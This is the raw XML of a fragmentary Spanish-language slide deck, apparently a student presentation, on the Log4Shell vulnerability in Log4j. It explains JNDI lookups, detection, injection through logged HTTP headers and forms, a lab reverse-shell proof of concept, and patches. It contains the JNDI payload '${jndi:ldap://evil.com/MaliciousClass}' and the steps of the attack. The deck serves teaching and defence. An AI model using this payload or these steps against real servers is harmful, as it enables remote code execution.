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aleway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Old Standard TT"/>
      <p:regular r:id="rId45"/>
      <p:bold r:id="rId46"/>
      <p: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Italic.fntdata"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15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7.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-boldItalic.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-italic.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OldStandardTT-bold.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OldStandardT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OldStandardTT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aleway-italic.fntdata"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Raleway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6f90357f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6f90357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ee4c0361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ee4c0361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ee4c0361f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ee4c036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ee4c0361f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ee4c0361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ee4c0361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ee4c0361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ee4c0361f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ee4c0361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ee4c0361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ee4c0361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ee4c0361f_0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ee4c0361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ee4c0361f_0_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0ee4c0361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ee4c0361f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ee4c0361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ee4c0361f_0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ee4c0361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ee4c0361f_0_9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ee4c0361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ee4c0361f_0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ee4c0361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ee4c0361f_0_1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0ee4c0361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ee4c0361f_0_1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ee4c0361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ee4c0361f_0_1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0ee4c0361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ee4c0361f_0_1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ee4c0361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ee4c0361f_0_1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ee4c0361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0ee4c0361f_0_1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0ee4c0361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b5669b21e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b5669b21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ec03fc6ab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ec03fc6a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ec03fc6ab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ec03fc6a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ee875054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ee87505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ee875054d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ee875054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lSszj52v1gde4iHmV8SMQAP4JQu0c_sZ/view" TargetMode="External"/><Relationship Id="rId5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10W60229eXDA1LjUJXeJkmVhrzhAX0Nj/view" TargetMode="External"/><Relationship Id="rId5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414150" y="338050"/>
            <a:ext cx="60570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y explotación de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2" y="4259175"/>
            <a:ext cx="7688100" cy="5412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s" sz="1560">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adrián Martín Marcos			756524</a:t>
            </a:r>
            <a:endParaRPr sz="156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s" sz="1560">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pablo López-Alonso Alonso		759836</a:t>
            </a:r>
            <a:endParaRPr sz="1560">
              <a:solidFill>
                <a:schemeClr val="dk2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527" y="1229662"/>
            <a:ext cx="4982952" cy="223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500" y="152400"/>
            <a:ext cx="715699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7788" y="655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Prueba de concepto: reverse shell</a:t>
            </a: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450" y="1097720"/>
            <a:ext cx="6087075" cy="353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512700" y="452625"/>
            <a:ext cx="81186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Aplicación web vulnerable</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="733350" y="1841225"/>
            <a:ext cx="79461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Contenedor Docker sobre máquina virtual Debian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Registra con Log4J campo ‘X-Api-Version’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Versión de Log4J vulnerable a Log4Shell</a:t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Máquina del atacante</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Google Shape;173;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598950" y="1348375"/>
            <a:ext cx="7946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Host real (Manjaro Linux)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Uso de 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○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‘netcat’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○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‘curl’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388" y="2714650"/>
            <a:ext cx="2153625" cy="3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550" y="4026325"/>
            <a:ext cx="852487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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299875" y="1577000"/>
            <a:ext cx="68865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Script Python sobre máquina virtual Kali Linux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Fork de proyecto ‘log4j-shell-poc’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413" y="2543163"/>
            <a:ext cx="6886575" cy="26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 (marshalling)</a:t>
            </a:r>
            <a:endParaRPr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475" y="1348550"/>
            <a:ext cx="4767034" cy="34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 (marshalling)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488" y="1348550"/>
            <a:ext cx="4767034" cy="34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 (marshalling)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488" y="1348550"/>
            <a:ext cx="4767034" cy="34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 (marshalling)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388" y="1348550"/>
            <a:ext cx="4781221" cy="34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512700" y="498050"/>
            <a:ext cx="811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LDAP malicioso (clase Exploit)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9225"/>
            <a:ext cx="4572000" cy="23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19225"/>
            <a:ext cx="4572000" cy="23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Índice</a:t>
            </a:r>
            <a:endParaRPr sz="3600"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En esta exposición…</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95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Conceptos base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Log4j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JNDI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Vulnerabilidad Log4shell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Formas de explotar Log4shell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Reverse shell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Mitigación y actualidad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primer paso</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Google Shape;219;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598950" y="1823300"/>
            <a:ext cx="7946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la máquina del atacante (192.168.56.1) dejar netcat escuchando en el puerto 12345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20" name="Google Shape;2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5175" y="3103075"/>
            <a:ext cx="2153625" cy="34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segundo paso</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;226;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563100" y="1259075"/>
            <a:ext cx="83814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la máquina del servidor LDAP malicioso (192.168.56.100) se lanza el servidor LDAP en el puerto 1389 y el servidor web en el puerto 8000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787" y="2447050"/>
            <a:ext cx="6498425" cy="269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tercer paso</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Google Shape;233;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581025" y="1597775"/>
            <a:ext cx="811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Enviar solicitud con la macro JNDI de Log4Shell al servidor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34" name="Google Shape;2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50" y="3013775"/>
            <a:ext cx="852487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resultados</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Google Shape;240;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581025" y="1597775"/>
            <a:ext cx="8118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el servidor LDAP malicioso se ha recibido la petición del recurso y se ha servido la clase Exploit con éxito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41" name="Google Shape;2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2063" y="2504550"/>
            <a:ext cx="6359875" cy="263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resultados</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Google Shape;247;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581025" y="1597775"/>
            <a:ext cx="8118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el servidor web se ha atendido la petición, pero no se ha enviado respuesta (se ha quedado ejecutando la clase Exploit)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48" name="Google Shape;2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24177"/>
            <a:ext cx="9144000" cy="2219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512700" y="441275"/>
            <a:ext cx="81186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ataque: resultados</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Google Shape;254;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581025" y="1597775"/>
            <a:ext cx="8118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ld Standard TT"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="22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la máquina del atacante se ha abierto un reverse shell en el programa ‘netcat’</a:t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13769"/>
            <a:ext cx="9143998" cy="1406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727788" y="655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Contramedidas</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Google Shape;261;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652225" y="1564050"/>
            <a:ext cx="7987500" cy="24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Actualización de Log4J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A partir de versión 2.17.0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Autoparche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62" name="Google Shape;2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5775"/>
            <a:ext cx="8839201" cy="611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727788" y="655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 de aplicar el autoparche: en el servidor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="268" name="Google Shape;26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3675"/>
            <a:ext cx="8839200" cy="3010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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727788" y="655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 de aplicar el autoparche: en el scanner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92625"/>
            <a:ext cx="8839203" cy="2907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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727788" y="655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 de aplicar el autoparche: en los ataques</a:t>
            </a:r>
            <a:endParaRPr/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375" y="1250025"/>
            <a:ext cx="7607251" cy="38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512700" y="434275"/>
            <a:ext cx="81186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Conceptos base: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Log4j</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598950" y="2343025"/>
            <a:ext cx="7946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Framework de logging para Java, de Apache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Biblioteca</a:t>
            </a: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de logging más popular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Permite logging de macros (lookups)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108100" y="4047150"/>
            <a:ext cx="4927800" cy="538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chemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>${java:version}’ →  ‘Java 1.8.0_181’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/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727650" y="614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540"/>
              <a:t>Conclusión</a:t>
            </a:r>
            <a:endParaRPr sz="2540"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Google Shape;286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Fallo de seguridad más grave de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>década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Relativamente f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>ácil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t> de explotar y de extremada gravedad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Parcheado, pero hay m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>uchos sistemas que difícilmente se pueden actualizar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Se tardará años en arreglar del todo</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="287" name="Google Shape;28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8275" y="493150"/>
            <a:ext cx="3265725" cy="21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0725" y="1322450"/>
            <a:ext cx="4471450" cy="335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¿Preguntas?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512700" y="538825"/>
            <a:ext cx="81186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Conceptos base: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JNDI</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;108;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533250" y="2121325"/>
            <a:ext cx="8077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API para buscar datos y recursos por su nombre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Consta de API (interfaz) y SPI (implementaciones)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Permite el servicio de directorio LDAP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ld Standard TT"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="2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En la carga incontrolada de clases de manera remota se encuentra el origen de Log4Shell</a:t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461850" y="4238600"/>
            <a:ext cx="8220300" cy="4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</a:rPr>
              <a:t>‘${jndi:ldap://evil.com/MaliciousClass}’ →  Executes malicious class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652225" y="6519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vulnerabilidad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652225" y="1564050"/>
            <a:ext cx="7987500" cy="24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Descubierta Alibaba Cloud el 24 de noviembre de 2021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Sustitución de los macros de JNDI sin restricciones. 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Con protocolo LDAP permite cargar código arbitrario ubicado de forma remota.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F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>ragmento de código causante de la brecha es clase </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es" sz="1600"/>
              <a:t>jndiManager.</a:t>
            </a:r>
            <a:endParaRPr i="1"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Segunda vulnerabilidad tras primer parche.</a:t>
            </a:r>
            <a:endParaRPr sz="1600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2350" y="176459"/>
            <a:ext cx="2252677" cy="101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612950" y="6519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Detección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612950" y="1313138"/>
            <a:ext cx="8520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Herramienta de la agencia de seguridad de Estados Unidos.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Peticiones HTTP  a un target insertando macros Log4J en distintas cabeceras.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"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2350" y="176459"/>
            <a:ext cx="2252677" cy="101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23850"/>
            <a:ext cx="9144000" cy="2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605350" y="6018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Explotación (en servidor web)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688075" y="1137000"/>
            <a:ext cx="6123600" cy="12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Usar campo HTTP del que se haga log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User-Agent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X-Api-Version</a:t>
            </a:r>
            <a:endParaRPr sz="16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9193">
            <a:off x="6732351" y="176457"/>
            <a:ext cx="2252677" cy="101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89494"/>
            <a:ext cx="9144000" cy="2957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605350" y="6018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Explotación (en servidor web)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688075" y="1137000"/>
            <a:ext cx="6123600" cy="6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Usar campo en los formularios web de los que se haga log</a:t>
            </a:r>
            <a:endParaRPr sz="1600"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2351" y="176457"/>
            <a:ext cx="2252677" cy="101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688075" y="4895825"/>
            <a:ext cx="6823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Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Fuente: https://user-images.githubusercontent.com/87979263/146113359-20663eaa-555d-4d60-828d-a7f769ebd266.mp4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0" title="146113359-20663eaa-555d-4d60-828d-a7f769ebd266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7775" y="1478200"/>
            <a:ext cx="6203549" cy="348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605350" y="6018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Explotación (en servidor web)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688075" y="1137000"/>
            <a:ext cx="6569400" cy="6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600"/>
              <a:t>O u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1600"/>
              <a:t>sar cualquier información accesible al usuario de la que se haga log…</a:t>
            </a:r>
            <a:endParaRPr sz="1600"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2351" y="176457"/>
            <a:ext cx="2252677" cy="101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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688075" y="4909200"/>
            <a:ext cx="740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Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Fuente: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="900">
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>https://user-images.githubusercontent.com/87979263/145681727-2bfd9884-a3e6-45dd-92e2-a624f29a8863.mp4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21" title="145681727-2bfd9884-a3e6-45dd-92e2-a624f29a8863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9550" y="1487100"/>
            <a:ext cx="6200002" cy="348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